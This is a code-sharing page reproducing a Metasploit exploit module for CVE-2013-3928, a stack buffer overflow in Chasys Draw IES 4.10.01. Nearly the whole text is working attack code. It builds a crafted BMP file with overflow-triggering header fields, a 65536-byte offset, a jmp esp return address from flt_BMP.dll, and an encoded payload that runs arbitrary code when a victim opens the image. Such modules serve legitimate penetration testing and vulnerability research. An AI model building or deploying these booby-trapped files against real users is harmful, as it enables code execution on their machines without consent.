扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "Chasys Draw IES Buffer Overflow", 'Description'=> %q{ This module exploits a buffer overflow vulnerability found in Chasys Draw IES (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while parsing BMP files, where the ReadFile function is used to store user provided data on thestack in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted BMP file. This module has been tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7 SP1. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Christopher Gabriel', # Vulnerability Discovery 'Longinos Recuero Bustos', # PoC 'Javier \'soez\'', # PoC 'juan vazquez' # Metasploit ], 'References' => [ [ 'CVE', '2013-3928' ], [ 'BID', '61463' ], [ 'URL', 'http://secunia.com/advisories/53773/' ], [ 'URL', 'http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html' ] ], 'Payload'=> { 'Space' => 21112, # Indeed there is more space available on the stack, just limited by the trigger 'DisableNops' => true }, 'Platform' => 'win', 'Targets'=> [ [ 'Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1', { 'Offset' => 65536, 'Ret' => 0x10005fd3 # jmp esp # from flt_BMP.dll v4.10.1.0 } ], ], 'Privileged' => false, 'DisclosureDate' => "Jul 26 2013", 'DefaultTarget'=> 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.','msf.bmp']), ], self.class) end def exploit bof = rand_text(target['Offset']) bof << [target.ret].pack("V") bof << payload.encoded bitmap_header = "" bitmap_header << [0x28].pack("V") # HeaderSize bitmap_header << [0x4a3].pack("V")# Width# Used to trigger the overflow bitmap_header << [0x1].pack("V")# Height bitmap_header << [0x9].pack("v")# Planes # Used to trigger the overflow bitmap_header << [0x41].pack("v") # BitCount # Used to trigger the overflow bitmap_header << [0x0].pack("V")# Compression bitmap_header << [bof.length].pack("V") # SizeImage bitmap_header << [0x0].pack("V")# PelsPerMeterX bitmap_header << [0x0].pack("V")# PelsPerMeterY bitmap_header << [0x0].pack("V")# ClrUse bitmap_header << [0x0].pack("V")# ClrImportant total_size = bof.length + bitmap_header.length + 14 # 14 => file header length file_header = "" file_header << "BM" # Signature file_header << [total_size].pack("V") # Size file_header << [0].pack("V")# Reserved file_header << [0x36].pack("V") # BitsOffsets bmp = file_header + bitmap_header + bof file_create(bmp) end end |
体验盒子
